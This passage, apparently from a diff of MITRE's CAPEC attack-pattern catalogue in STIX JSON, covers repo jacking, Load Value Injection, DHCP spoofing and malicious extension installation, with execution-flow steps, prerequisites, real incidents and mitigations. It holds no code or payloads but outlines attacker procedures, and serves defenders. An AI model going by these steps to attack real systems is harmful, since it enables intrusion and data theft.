", + "x_capec_extended_description": "\n Software developers may directly reference a VCS repository (i.e., via a hardcoded URL) within source code to integrate the repository as a dependency for the underlying application. If the repository owner/maintainer modifies the repository name, changes their VCS username, or transfers ownership of the repository, the VCS implements a redirect to the new repository location so that existing software referencing the repository will not break. However, if the original location of the repository is reestablished, the VCS will revert to resolving the hardcoded path. Adversaries may, therefore, re-register deleted or previously used usernames and recreate repositories with malicious code to infect applications referencing the repository. When an application then fetches the desired dependency, it will now reference the adversary's malicious repository since the hardcoded repository path is once again active. This ultimately allows the adversary to infect numerous applications, while achieving a variety of negative technical impacts.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular repository that may be directly referenced in numerous software applications", + "A repository owner/maintainer who has recently changed their username or deleted their account" + ], + "x_capec_skills_required": { + "Low": "Ability to create malware that can exploit various software applications." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage dedicated package managers instead of directly linking to VCS repositories.", + "id": "course-of-action--2798a4f8-6cf8-4183-9aa4-0593c6240e67", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f8521e30-5610-4802-b738-4fedb6a77770", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2798a4f8-6cf8-4183-9aa4-0593c6240e67", + "spec_version": "2.1", + "target_ref": "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize version pinning and lock files to prevent use of maliciously modified repositories.", + "id": "course-of-action--ddf12a53-6061-49a0-acd2-8888eafd9817", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--97bcf4a9-cd9a-4fc7-803f-183d68cd9ca9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ddf12a53-6061-49a0-acd2-8888eafd9817", + "spec_version": "2.1", + "target_ref": "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement \"vendoring\" (i.e., including third-party dependencies locally) and leverage automated testing techniques (e.g., static analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--50beff7f-09d4-4623-a555-68ed2973d99d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38bf2a91-cb47-4c20-8845-30d7b0a991f3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50beff7f-09d4-4623-a555-68ed2973d99d", + "spec_version": "2.1", + "target_ref": "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage automated tools, such as Checkmarx's \"ChainJacking\" tool, to determine susceptibility to Repo Jacking attacks.", + "id": "course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-3", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--97750db1-2852-4168-be21-3c3d533a672b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d", + "spec_version": "2.1", + "target_ref": "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution in which a faulting or assisted load instruction transiently forwards adversary-controlled data from microarchitectural buffers. By inducing a page fault or microcode assist during victim execution, an adversary can force legitimate victim execution to operate on the adversary-controlled data which is stored in the microarchitectural buffers. 
The adversary can then use existing code gadgets and side channel analysis to discover victim secrets that have not yet been flushed from microarchitectural state or hijack the system control flow.", + "external_references": [ + { + "external_id": "CAPEC-696", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/696.html" + }, + { + "external_id": "CWE-1342", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1342.html" + }, + { + "description": "Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss, Frank Piessens, LVI - Hijacking Transient Execution with Load Value Injection", + "external_id": "REF-735", + "source_name": "reference_from_CAPEC", + "url": "https://lviattack.eu/" + }, + { + "description": "Load Value Injection, 2020--01---27, Intel", + "external_id": "REF-736", + "source_name": "reference_from_CAPEC", + "url": "https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/load-value-injection.html" + } + ], + "id": "attack-pattern--faa02de4-0f9b-4881-a088-b2a4d64475fd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Load Value Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack. The adversary looks for code gadgets which will allow them to load an adversary-controlled value into trusted memory. They also look for code gadgets which might operate on this controlled value.

  2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.

Experiment

  1. Fill microarchitectural buffer with controlled value: The adversary will utilize the found code gadget from the previous step to load a value into a microarchitectural buffer.

  2. Techniques
    The adversary may choose the controlled value to be memory address of sensitive information that they want the system to access
    The adversary may choose the controlled value to be the memory address of other code gadgets that they wish to execute by hijacking the control flow of the system
  3. Set up instruction to page fault or microcode assist: The adversary must manipulate the system such that a page fault or microcode assist occurs when a valid instruction is run. If the instruction that fails is near where the adversary-controlled value was loaded, the system may forward this value from the microarchitectural buffer incorrectly.

  4. Techniques
    When targeting Intel SGX enclaves, adversaries that have privileges can manipulate PTEs to provoke page-fault exceptions or microcode assists.
    When targeting Intel SGX enclaves, adversaries can indirectly revoke permissions for enclave code through the “mprotect” system call
    An adversary can evict selected virtual memory pages using legacy interfaces or by increasing physical memory utilization
    When attacking a Windows machine, wait until the OS clears the PTE accessed bit. When the page is next accessed, the CPU will always issue a microcode assist for re-setting this bit

Exploit

  1. Operate on adversary-controlled data: Once the attack has been set up and the page fault or microcode assist occurs, the system operates on the adversary-controlled data.

  2. Techniques
    Influence the system to load sensitive information into microarchitectural state which can be read by the adversary using a code gadget.
    Hijack execution by jumping to second stage gadgets found in the address space. By utilizing return-oriented programming, this can chain gadgets together and allow the adversary to execute a sequence of gadgets.
", + "x_capec_extended_description": "This attack is a mix of techniques used in traditional Meltdown and Spectre attacks. It uses microarchitectural data leakage combined with code gadget abuse. Intel has identified that this attack is not applicable in scenarios where the OS and the VMM (Virtual Memory Manager) are both trusted. Because of this, Intel SGX is a prime target for this attack because it assumes that the OS or VMM may be malicious.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU.", + "The CPU incorrectly transiently forwards values from microarchitectural buffers after faulting or assisted loads", + "The adversary needs the ability to induce page faults or microcode assists on the target system.", + "Code gadgets exist that allow the adversary to hijack transient execution and encode secrets into the microarchitectural state." + ], + "x_capec_skills_required": { + "High": "The ability to provoke faulting or assisted loads in legitimate execution." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow the forwarding of data resulting from a faulting or assisted instruction. 
Some current mitigations claim to zero out the forwarded data, but this mitigation still does not suffice.", + "id": "course-of-action--f448a9da-f220-4155-8e2d-9731566e757b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-696-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--533e10e1-fa6d-486b-b385-186ae97f08d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f448a9da-f220-4155-8e2d-9731566e757b", + "spec_version": "2.1", + "target_ref": "attack-pattern--faa02de4-0f9b-4881-a088-b2a4d64475fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Insert explicit “lfence” speculation barriers in software before potentially faulting or assisted loads. 
This halts transient execution until all previous instructions have been executed and ensures that the architecturally correct value is forwarded.", + "id": "course-of-action--75932c7c-caa1-4a40-8d0a-cd67606f00cd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-696-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--97595f95-a08b-4ef2-abf5-4cf5d4abc0f5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--75932c7c-caa1-4a40-8d0a-cd67606f00cd", + "spec_version": "2.1", + "target_ref": "attack-pattern--faa02de4-0f9b-4881-a088-b2a4d64475fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary masquerades as a legitimate Dynamic Host Configuration Protocol (DHCP) server by spoofing DHCP traffic, with the goal of redirecting network traffic or denying service to DHCP.\n ", + "external_references": [ + { + "external_id": "CAPEC-697", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Adversary-in-the-Middle: DHCP Spoofing", + "external_id": "T1557.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557/003" + }, + { + "description": "Yuval Lazar, DHCP Spoofing 101, 2021--11---03, Pentera", + "external_id": "REF-737", + "source_name": "reference_from_CAPEC", + "url": " 
https://pentera.io/blog/dhcp-spoofing-101" + }, + { + "description": "T. Melsen, S. Blake, Ericsson, DHCP Spoofing 101, 2006--06, The Internet Society", + "external_id": "REF-738", + "source_name": "reference_from_CAPEC", + "url": "https://www.rfc-editor.org/rfc/rfc4562.html" + }, + { + "description": "Bosco Sebastian, DHCP Spoofing 101, 2019--08---02, McAfee", + "external_id": "REF-739", + "source_name": "reference_from_CAPEC", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/dhcp-client-remote-code-execution-vulnerability-demystified/" + } + ], + "id": "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DHCP Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Modify Data", + "Execute Unauthorized Commands" + ], + "Availability": [ + "Resource Consumption" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In early 2019, Microsoft patched a critical vulnerability (CVE-2019-0547) in the Windows DHCP client which allowed remote code execution via crafted DHCP OFFER packets. [REF-739]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Exsisting DHCP lease: An adversary observes network traffic and waits for an existing DHCP lease to expire on a target machine in the LAN.

  2. Techniques
    Adversary observes LAN traffic for DHCP solicitations

Experiment

  1. Capture the DHCP DISCOVER message: The adversary captures \"DISCOVER\" messages and crafts \"OFFER\" responses for the identified target MAC address. The success of this attack centers on the capturing of and responding to these \"DISCOVER\" messages.

  2. Techniques
    Adversary captures and responds to DHCP \"DISCOVER\" messages tailored to the target subnet.

Exploit

  1. Compromise Network Access and Collect Network Activity: An adversary successfully acts as a rogue DHCP server by redirecting legitimate DHCP requests to itself.

  2. Techniques
    Adversary sends repeated DHCP \"REQUEST\" messages to quickly lease all the addresses within network's DHCP pool and forcing new DHCP requests to be handled by the rogue DHCP server.
", + "x_capec_extended_description": "\n DHCP is broadcast to the entire Local Area Network (LAN) and does not have any form of authentication by default. Therefore, it is susceptible to spoofing.\n An adversary with access to the target LAN can receive DHCP messages; obtaining the topology information required to potentially manipulate other hosts' network configurations.\n To improve the likelihood of the DHCP request being serviced by the Rogue server, an adversary can first starve the DHCP pool.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have access to a machine within the target LAN which can send DHCP offers to the target." + ], + "x_capec_resources_required": [ + "The adversary requires access to a machine within the target LAN on a network which does not secure its DHCP traffic through MAC-Forced Forwarding, port security, etc." + ], + "x_capec_skills_required": { + "Medium": "The adversary must identify potential targets for DHCP Spoofing and craft network configurations to obtain the desired results." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: MAC-Forced Forwarding", + "id": "course-of-action--f8527ee0-b919-44c6-9624-b1882fcd5ea2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7f36d918-0b20-49cb-a263-39aaa5bd156e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8527ee0-b919-44c6-9624-b1882fcd5ea2", + "spec_version": "2.1", + "target_ref": "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Port Security and DHCP snooping", + "id": "course-of-action--3a6b926d-1185-43d9-b4cb-e5e0103147c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed2696d0-e825-42a5-9f7d-f9fa98137830", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", 
+ "source_ref": "course-of-action--3a6b926d-1185-43d9-b4cb-e5e0103147c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Network-based Intrusion Detection Systems", + "id": "course-of-action--671abff4-2c61-4e1e-9620-59ba9d4a9ce7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a28827fa-1c3a-40eb-a7aa-01960d117a6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--671abff4-2c61-4e1e-9620-59ba9d4a9ce7", + "spec_version": "2.1", + "target_ref": "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary directly installs or tricks a user into installing a malicious extension into existing trusted software, with the goal of achieving a variety of negative technical impacts.\n ", + "external_references": [ + { + "external_id": "CAPEC-698", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/698.html" + }, + { + "external_id": "CWE-507", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/507.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Browser Extensions", + "external_id": "T1176", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1176" + }, + { + "description": "Server Software Component: IIS Components", + "external_id": "T1505.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/004" + }, + { + "description": "Robert Falcone, OilRig uses RGDoor IIS Backdoor on Targets in the Middle East, 2018--01---25, Palo Alto Networks", + "external_id": "REF-740", + "source_name": "reference_from_CAPEC", + "url": "https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + }, + { + "description": "ASERT Team, STOLEN PENCIL Campaign Targets Academia, 2018--12---05, NETSCOUT", + "external_id": "REF-741", + "source_name": "reference_from_CAPEC", + "url": "https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia" + } + ], + "id": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Install Malicious Extension", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In January 2018, Palo Alto's Unit 42 reported that a malicious Internet Information Services (IIS) extension they named RGDoor was used to create a backdoor into several Middle Eastern 
government organizations, as well as a financial institution and an educational institution. This malware was used in conjunction with the TwoFace webshell and allowed the adversaries to upload/download files and execute unauthorized commands. [REF-740]\n ", + "\n In December 2018, it was reported that North Korea-based APT Kimusky (also known as Velvet Chollima) infected numerous legitimate academic organizations within the U.S., many specializing in biomedical engineering, with a malicious Google Chrome extension. Dubbed \"Operation STOLEN PENCIL\", the attack entailed conducting spear-phishing attacks to trick victims into installing a malicious PDF reader named \"Auto Font Manager\". Once installed, the malware allowed adversaries to steal cookies and site passwords, as well as forward emails from some compromised accounts. [REF-741]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target(s): The adversary must first identify target software that allows for extensions/plugins and which they wish to exploit, such as a web browser or desktop application. To increase the attack space, this will often be popular software with a large user-base.

Experiment

  1. Create malicious extension: Having identified a suitable target, the adversary crafts a malicious extension/plugin that can be installed by the underlying target software. This malware may be targeted to execute on specific operating systems or be operating system agnostic.

Exploit

  1. Install malicious extension: The malicious extension/plugin is installed by the underlying target software and executes the adversary-created malware, resulting in a variety of negative technical impacts.

  2. Techniques
    Adversary-Installed: Having already compromised the target system, the adversary simply installs the malicious extension/plugin themself.
    User-Installed: The adversary tricks the user into installing the malicious extension/plugin, via means such as social engineering, or may upload the malware on a reputable extension/plugin hosting site and wait for unknowing victims to install the malicious component.
", + "x_capec_extended_description": "\n Many software applications allow users to install third-party software extensions/plugins that provide additional features and functionality. Adversaries can take advantage of this behavior to install malware on a system with relative ease. This may require the adversary compromising a system and then installing the malicious extension themself. An alternate approach entails masquerading the malicious extension as a legitimate extension. The adversary then convinces users to install the malicious component, via means such as social engineering, or simply waits for victims to unknowingly install the malware on their systems. Once the malicious extension has been installed, the adversary can achieve a variety of negative technical impacts such as obtaining sensitive information, executing unauthorized commands, observing/modifying network traffic, and more.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must craft malware based on the type of software and system(s) they intend to exploit.", + "If the adversary intends to install the malicious extension themself, they must first compromise the target machine via some other means." + ], + "x_capec_skills_required": { + "Medium": "Optional: Ability to exploit target system(s) via other means in order to gain entry." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only install extensions/plugins from official/verifiable sources.", + "id": "course-of-action--cc64512c-5bfe-4278-8b07-ce829e168728", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2807bdb4-9794-4fc1-bdda-ab3dd9b934e9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cc64512c-5bfe-4278-8b07-ce829e168728", + "spec_version": "2.1", + "target_ref": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Confirm extensions/plugins are legitimate and not malware masquerading as a legitimate extension/plugin.", + "id": "course-of-action--49e26aac-6fb0-47d0-ac5d-189c635bcdc9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6268fd8d-275a-45ec-b2d0-1847ab21681a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49e26aac-6fb0-47d0-ac5d-189c635bcdc9", + "spec_version": "2.1", + "target_ref": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the underlying software leveraging the extension/plugin (including operating systems) is up-to-date.", + "id": "course-of-action--c3450828-c9cf-4d46-a741-9a54bc1a2ccb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71b550d1-dfe9-4f8e-8c1d-fb95610dc91e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c3450828-c9cf-4d46-a741-9a54bc1a2ccb", + "spec_version": "2.1", + "target_ref": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement an extension/plugin allow list, based on the given security policy.", + "id": "course-of-action--61c1c9ea-6c17-4290-ab72-aadec28bff84", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + 
